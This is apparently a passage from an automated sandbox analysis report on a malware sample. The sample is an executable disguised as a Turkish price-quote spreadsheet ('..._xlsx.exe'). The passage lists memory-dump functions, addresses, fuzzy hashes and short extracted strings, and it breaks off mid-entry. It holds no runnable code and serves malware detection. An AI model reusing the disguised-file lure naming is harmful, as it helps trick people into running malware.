Instruction Fuzzy Hash: B4110FB6C002498FDB20CF9AC544BDEFBF4EF88214F14846AD818AB200C379A545CFA1

Function 0163D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da52f494d4a381740ac99b171184dfaa8ed17f0708274b5da9ff8b3b6bf9ad4a
Instruction ID: 87ea3c3c8fbdfab30a8c98f7c5033a7b4fd346ab45f786d4b3c084d7f894dab7
Opcode Fuzzy Hash: da52f494d4a381740ac99b171184dfaa8ed17f0708274b5da9ff8b3b6bf9ad4a
Instruction Fuzzy Hash: 6A21D3B2504240EFDB15DF54D9C0B26BF65FBC8328F64C569E9090B297C336D456CAA2

Function 0163D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57b7275435085ad1f81b8b7eb204e5cb663e74297f72d8aad734a2af6a91f7f8
Instruction ID: d45bb2d639e68195607fa90c6c3cb7e80c7a38e3be614545fa35dcb2431052db
Opcode Fuzzy Hash: 57b7275435085ad1f81b8b7eb204e5cb663e74297f72d8aad734a2af6a91f7f8
Instruction Fuzzy Hash: 9121F1B2504204EFDB15DF54D9C0B6ABB65FBC8324F60C569E90A0B257C336E856CAA2

Function 01B2D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a879d43bfcd3037a33cf43856128436fe604b546a6fc95cdbd553ae3633491d
Instruction ID: 123247fe413d2404bf30ba40d07ad17175d37ca5c512905adf369b0ecfc667c4
Opcode Fuzzy Hash: 6a879d43bfcd3037a33cf43856128436fe604b546a6fc95cdbd553ae3633491d
Instruction Fuzzy Hash: 5521F971A04304EFDB19DF94D5C4B25BB65FB85324F24CAADE90D4F292C336D44ACA61

Function 01B2D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f44286d4aaebdedb88f7bb3a0f4a8b06c0b3850659725cf99831a2c201e556b
Instruction ID: 6b3ff87e9bafe8c01881bf5ee11ac1fdef1a906b45fcf5f3f6be7e894385d90d
Opcode Fuzzy Hash: 2f44286d4aaebdedb88f7bb3a0f4a8b06c0b3850659725cf99831a2c201e556b
Instruction Fuzzy Hash: 72210371504240DFDB19DF64D590B17BB61EB88314F20C6ADE90E4B2A6C33AD40BCA62

Function 01B2D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe4598e467e0441148f19ce4a037943d6a1ff8288a3b6d4b5496585846a96b0
Instruction ID: dbfcc0df62b386351188aa3725a83f7fb3674c712b9a173ae55c20e7e12fd0b7
Opcode Fuzzy Hash: 4fe4598e467e0441148f19ce4a037943d6a1ff8288a3b6d4b5496585846a96b0
Instruction Fuzzy Hash: 152180755083809FCB16CF54D994B12BF71EB4A214F28C5DAD8498F2A7C33A980ACB62

Function 0163D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: ad3c308ce1e6d662b84669affb520b2c4384207037cdbc197fe90e6af03344c9
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 5E11E1B2504280DFCB16CF54D9C0B16BF71FB84324F24C6A9D8090B697C336D456CBA2

Function 0163D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: 6cdee1585e5866b75e804385d4a24d2a189b30f5d4ae4f63c84cc73d6d54266a
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: FC11DCB2404280DFDB16CF54D9C0B56BF72FB84324F24C6A9D9090B657C33AE45ACBA2

Function 01B2D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 4572567bee8a43c9045e222745626ee61200391e55c4008f22a41ab7b16e595a
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 3D11BB75904280DFDB1ACF54D5C0B15FFA1FB85324F24CAA9D8494B696C33AD40ACB62

Function 0163D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2e2338cbdb4058439d002f193aaaef215ea9f6d8e882b1dee21be3bc0fa835
Instruction ID: 1c9ee4ccf8068437716ff0500912830d6e26725df2dcc9b94d653d32d1f05f76
Opcode Fuzzy Hash: ad2e2338cbdb4058439d002f193aaaef215ea9f6d8e882b1dee21be3bc0fa835
Instruction Fuzzy Hash: 0201AC714043809AE7214A69CD84776BBE8DF81624F548559ED090E386C7759445CAB1

Function 0163D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7353a63db8e4095d8a13094889f798d7908cd8eb5a3a24ceb9a39193751d002
Instruction ID: e100e157f1b75334aa03470637dfeb9be6cb3d3360e7225526e2ef144e8c1c1c
Opcode Fuzzy Hash: b7353a63db8e4095d8a13094889f798d7908cd8eb5a3a24ceb9a39193751d002
Instruction Fuzzy Hash: BBF06271404384AEE7258A5ADD84B62FFE8EF91724F18C55AED084F387C379A844CAB1

Non-executed Functions

Function 07DC54B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8573d036b6df662797aaa640bee05a3e41bfca4fbdd2174a76c6af24c0d76d93
Instruction ID: d5b0b96eabd90b2166097c0ae2af501c50737cf44028339d7bb9c34dadd44541
Opcode Fuzzy Hash: 8573d036b6df662797aaa640bee05a3e41bfca4fbdd2174a76c6af24c0d76d93
Instruction Fuzzy Hash: 6CE1FAB4E0021A8FDB14DF99D580AAEFBF2FF89305F248159D815AB355D734A941CFA0

Function 07DC3458 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e263e69802b7a888e7cd241b162f75e9fd8fd586e1241b9d5ef54e895bc74e1
Instruction ID: d3f030a79a3be733fc7791fd5a9e6b72b289dc9a49dcb1019877a2918310af27
Opcode Fuzzy Hash: 3e263e69802b7a888e7cd241b162f75e9fd8fd586e1241b9d5ef54e895bc74e1
Instruction Fuzzy Hash: 94E1F7B4E0021A8FDB14DFA9C580AAEFBB2FF89305F24C159D844AB355C735A941CFA1

Function 07DC2BE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3acbc03863257d2e6430be12eb186b39d561e8de44cff1423a93ced11d51254
Instruction ID: 1b9eb5b2065ea098df56fa6d0f568bc3ad433b40a7f546323358176107445eda
Opcode Fuzzy Hash: b3acbc03863257d2e6430be12eb186b39d561e8de44cff1423a93ced11d51254
Instruction Fuzzy Hash: 8FE1E9B4E0021A8FDB14DF99C580AAEFBF6FF89305F248169D814AB355D735A941CFA0

Function 07DC4B00 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07371269f42dd8d0612f9c26bf0d33e89fa8e92e88a34be76bbc5c51be3841a8
Instruction ID: fadf652715ddce0286cfd015a8ac58695e9c40e0376a8f4b8a0e7720f92a9955
Opcode Fuzzy Hash: 07371269f42dd8d0612f9c26bf0d33e89fa8e92e88a34be76bbc5c51be3841a8
Instruction Fuzzy Hash: 7BE109B4E0025A8FDB14DFA9C590AAEFBF6FF89305F248159D804AB355C734A941CFA0

Function 07DC3020 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766f5ac5c8b790c079382b527520822b0a6b78400da81abb7ea3ccae28084a60
Instruction ID: 3bf56b147692d68512abf7553deedc254caef7a1f682b510bfbdfef47ca2a5a3
Opcode Fuzzy Hash: 766f5ac5c8b790c079382b527520822b0a6b78400da81abb7ea3ccae28084a60
Instruction Fuzzy Hash: 31E1E7B4E0021A8FDB14DF99C580AAEFBB2FF89305F24C159D814AB355DB35A941CFA1

Function 031DD55C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d084f2b47aa75b5d6ddc61e272ca64996e6c60a1090fc875d743b2b8cd3469
Instruction ID: a4e2ebfa6660a56d52e2181154c3fc864753a0316ea49d630696965aa78a6409
Opcode Fuzzy Hash: 83d084f2b47aa75b5d6ddc61e272ca64996e6c60a1090fc875d743b2b8cd3469
Instruction Fuzzy Hash: B7A17136E003158FCF05DFB4D88459EB7B6FF8A300B1581A9E806AF265DB31EA56CB40

Function 07DC3448 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9361d90af07ee4a9001702bfb58e3bdfb86458735778b974fd6451c9e86ac493
Instruction ID: 29255a50f6101bf60a149dd6563d144520269b9ead331b7a30c55b7a6cc325be
Opcode Fuzzy Hash: 9361d90af07ee4a9001702bfb58e3bdfb86458735778b974fd6451c9e86ac493
Instruction Fuzzy Hash: C2510DB4E142198FDB14CFA9C5405AEFBF2BF89304F24C169D418AB355D7359941CFA1

Analysis Process: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exePID: 7944, Parent PID: 7464COMMON

Executed Functions

Function 0133C146 Relevance: 6.5, Strings: 5, Instructions: 228COMMON

Download Yara Rule

Strings

LjMp, xrefs: 0133C377
0oMp, xrefs: 0133C20A
PHq, xrefs: 0133C3EF
LjMp, xrefs: 0133C38D
PHq, xrefs: 0133C400

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 1d8bca7d820713c0db94b5d04a495e9fae9353ea869aa3f17104fb8b6a9e4a8f
Instruction ID: 5dd3b4271116d5f80b0dc6881b69941917a9c8f7bb3aaa974b5540f14b7cdf1a
Opcode Fuzzy Hash: 1d8bca7d820713c0db94b5d04a495e9fae9353ea869aa3f17104fb8b6a9e4a8f
Instruction Fuzzy Hash: DFA1E775E00218CFDB14DFAAD984A9DBBF2BF89314F14906AE409BB361DB349942CF54

Function 0133C738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PHq, xrefs: 0133C9A0
0oMp, xrefs: 0133C7AA
PHq, xrefs: 0133C98F
LjMp, xrefs: 0133C92D
LjMp, xrefs: 0133C917

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 808c30132767eecbf31dacd0f1cfc39151741e8f723901295ddf2d87fafacc92
Instruction ID: 419a053627efff043477919aeec0a66d8ba385807122b5dd40e0f586c7840a4f
Opcode Fuzzy Hash: 808c30132767eecbf31dacd0f1cfc39151741e8f723901295ddf2d87fafacc92
Instruction Fuzzy Hash: 5781B474E00218CFEB14DFAAD984A9DBBF2BF88314F14D06AE419AB365DB345941CF54

Function 0133CFA9 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjMp, xrefs: 0133D187
PHq, xrefs: 0133D1FF
0oMp, xrefs: 0133D01A
PHq, xrefs: 0133D210
LjMp, xrefs: 0133D19D

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 3ab59b34e318c2a72ab452ac38a9372a6b64eb407e93247a9fc5c97a0970c55b
Instruction ID: 0fedcc690e76ee369e2c62e79ef75545a5064f8f9ed9f92faa905143f84242bc
Opcode Fuzzy Hash: 3ab59b34e318c2a72ab452ac38a9372a6b64eb407e93247a9fc5c97a0970c55b
Instruction Fuzzy Hash: 9081C374E00218CFEB54DFAAD984A9DBBF2BF88314F14C169E809AB365DB349941CF54

Function 0133C473 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

PHq, xrefs: 0133C6BF
LjMp, xrefs: 0133C65D
PHq, xrefs: 0133C6D0
0oMp, xrefs: 0133C4DA
LjMp, xrefs: 0133C647

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 3e7fab4fe1ec551b93c9e2603e3fd58d15a94c0ebfe721da138817ede191f18b
Instruction ID: 21cc4394d22d88c7a8df3e8adf5f98214da797808ec1f6b5d9dc9fc748a8bfc9
Opcode Fuzzy Hash: 3e7fab4fe1ec551b93c9e2603e3fd58d15a94c0ebfe721da138817ede191f18b
Instruction Fuzzy Hash: 8581B274E00218CFEB14DFAAD984A9DBBF2BF88314F14D16AE419AB365DB309941CF54

Function 0133CCDF Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

PHq, xrefs: 0133CF2F
LjMp, xrefs: 0133CECD
PHq, xrefs: 0133CF40
LjMp, xrefs: 0133CEB7
0oMp, xrefs: 0133CD4A

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: c631be3364d3671648f0247cff9d79d9a916a4228c4eed69efb164d10bbd1448
Instruction ID: 6e9dba72e8226b13fe6da06a54f70099663a22739fc064cb9e8ce4f72714938c
Opcode Fuzzy Hash: c631be3364d3671648f0247cff9d79d9a916a4228c4eed69efb164d10bbd1448
Instruction Fuzzy Hash: BC81C274E00218CFEB14DFAAD994A9DBBF2BF88304F14D06AE409AB365DB309945CF54

Function 0133D283 Relevance: 6.4, Strings: 5, Instructions: 182COMMON

Download Yara Rule

Strings

PHq, xrefs: 0133D4CF
0oMp, xrefs: 0133D2EA
PHq, xrefs: 0133D4E0
LjMp, xrefs: 0133D457
LjMp, xrefs: 0133D46D

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: e4a665a01307f8df5428e54a2e9e4f81f59ddb25f474e182273c2161ff352433
Instruction ID: ac154012e5656c91f9eecaac61abaf0d3ea1d96804e43b21dbe8429938f44678
Opcode Fuzzy Hash: e4a665a01307f8df5428e54a2e9e4f81f59ddb25f474e182273c2161ff352433
Instruction Fuzzy Hash: 6181B374E00218CFEB14DFAAD984A9DBBF2BF88314F14C169E819AB365DB349941CF54

Function 0133CA13 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

LjMp, xrefs: 0133CBE7
LjMp, xrefs: 0133CBFD
0oMp, xrefs: 0133CA7A
PHq, xrefs: 0133CC5F
PHq, xrefs: 0133CC70

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 5aad0e65abda2f4c296bc93354441374b72c807bc6eae0c3a063cb675fcca2ba
Instruction ID: 9c86b1418b7a77ebb631fc06db6cbac27915fbb2787f0d7fbcd135c9ffc806ad
Opcode Fuzzy Hash: 5aad0e65abda2f4c296bc93354441374b72c807bc6eae0c3a063cb675fcca2ba
Instruction Fuzzy Hash: D281A574E00218CFEB14DFAAD994A9DBBF2BF88304F14D06AE419AB365DB349941CF54

Function 01336FC8 Relevance: 4.3, Strings: 3, Instructions: 519COMMON

Download Yara Rule

Strings

(oq, xrefs: 01337220
(oq, xrefs: 0133753D
(oq, xrefs: 01337212

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq
API String ID: 0-3376450984
Opcode ID: 608e9a83d5d8200d0f25f22ce809bf7dde9a6326f4e2e425ac4d90cb12b14901
Instruction ID: bccf6100f9d5f46f34f0f2ffa1ecce4d2632ead857dd653906614876d5254071
Opcode Fuzzy Hash: 608e9a83d5d8200d0f25f22ce809bf7dde9a6326f4e2e425ac4d90cb12b14901
Instruction Fuzzy Hash: 3F225FB0A00259DFDB15CF69C984AAEBBF6BF88318F158069E905EB361D734EC41CB54

Function 01335377 Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

PHq, xrefs: 013355C8
PHq, xrefs: 013355D9
0oMp, xrefs: 013353E2

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$PHq$PHq
API String ID: 0-280325872
Opcode ID: 78488ae227a5370559ffb9bbcb62524646b26b2885b5c7f5790dbfb9971b9e05
Instruction ID: ed285ce221a68d299b74aeea6d9ccb2be753d98ac79f7245d5bc0945ddfde2f6
Opcode Fuzzy Hash: 78488ae227a5370559ffb9bbcb62524646b26b2885b5c7f5790dbfb9971b9e05
Instruction Fuzzy Hash: 0161A675E00218DFEB18DFAAD944A9DBBF2BF88300F14C169E819AB365DB345941CF54

Function 013369AB Relevance: 1.7, Strings: 1, Instructions: 448COMMON

Download Yara Rule

Strings

(oq, xrefs: 01336EDA

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: e472830d4303d54c95cb3c55c6f987d01dd355f7dddc41500d4f3f6f38d4394f
Instruction ID: fb921248d0020861fcf95c6ad6bbbd30d8237823ee0ff95666e5e9b4916e5f57
Opcode Fuzzy Hash: e472830d4303d54c95cb3c55c6f987d01dd355f7dddc41500d4f3f6f38d4394f
Instruction Fuzzy Hash: EA028EB0A002199FDB14DF69D855BAEBBF6BFC8304F248119E506AB395DF309E41CB84

Function 01333E09 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

$q, xrefs: 01333E2E

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 008b08b575d5406fc3285924e43e9e07ba9ff7b38b911f5e1b38315a5eaa243b
Instruction ID: efb98334bfd92143571d2984532fb2bca76602152fcb5aa07a159ad79894f77c
Opcode Fuzzy Hash: 008b08b575d5406fc3285924e43e9e07ba9ff7b38b911f5e1b38315a5eaa243b
Instruction Fuzzy Hash: AE919534B04218DBDB5CAB78985467FBBB7BFC8714B04861DD506EB394CE359C028B95

Function 013329EC Relevance: .5, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daff023afbcf6c23f3cc6077d7986e6e18933597f93b79d97a15f4d569d8ab87
Instruction ID: 72258597114701821726bbeee4e4b8f6fe6b90dce742a3323a99672a336be0e8
Opcode Fuzzy Hash: daff023afbcf6c23f3cc6077d7986e6e18933597f93b79d97a15f4d569d8ab87
Instruction Fuzzy Hash: EB02BE329147A48FCBA2CF38C4D0757BBB1FF8A318B5588EDD4419B926D735A811DB82

Function 01333AA1 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eadaf029455f260a24bed8847dc6187285e43424fe7bc8407efc51c26ff6eca9
Instruction ID: f8d9728ec72952f45566107f386a48f100b2391ddb4c5ea2ac6725a665bddef8
Opcode Fuzzy Hash: eadaf029455f260a24bed8847dc6187285e43424fe7bc8407efc51c26ff6eca9
Instruction Fuzzy Hash: AAA1AE32A087A08BCF66CF38C9D57577FB1FF4722874884DDD4828A91AD6749800DB87

Function 0133E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad46d57652dcf14020c0c72fa71231d37547e6f8960f72c525ce1e84e0cc13df
Instruction ID: 6b953f13ce644d490eecb59ef1355e43667f700cb39f704678976c9307b0c66e
Opcode Fuzzy Hash: ad46d57652dcf14020c0c72fa71231d37547e6f8960f72c525ce1e84e0cc13df
Instruction Fuzzy Hash: A5518674E00218DFEB18DFAAD594A9DBBF2FF89300F248129E815AB365DB345842CF54

Function 0133E97B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

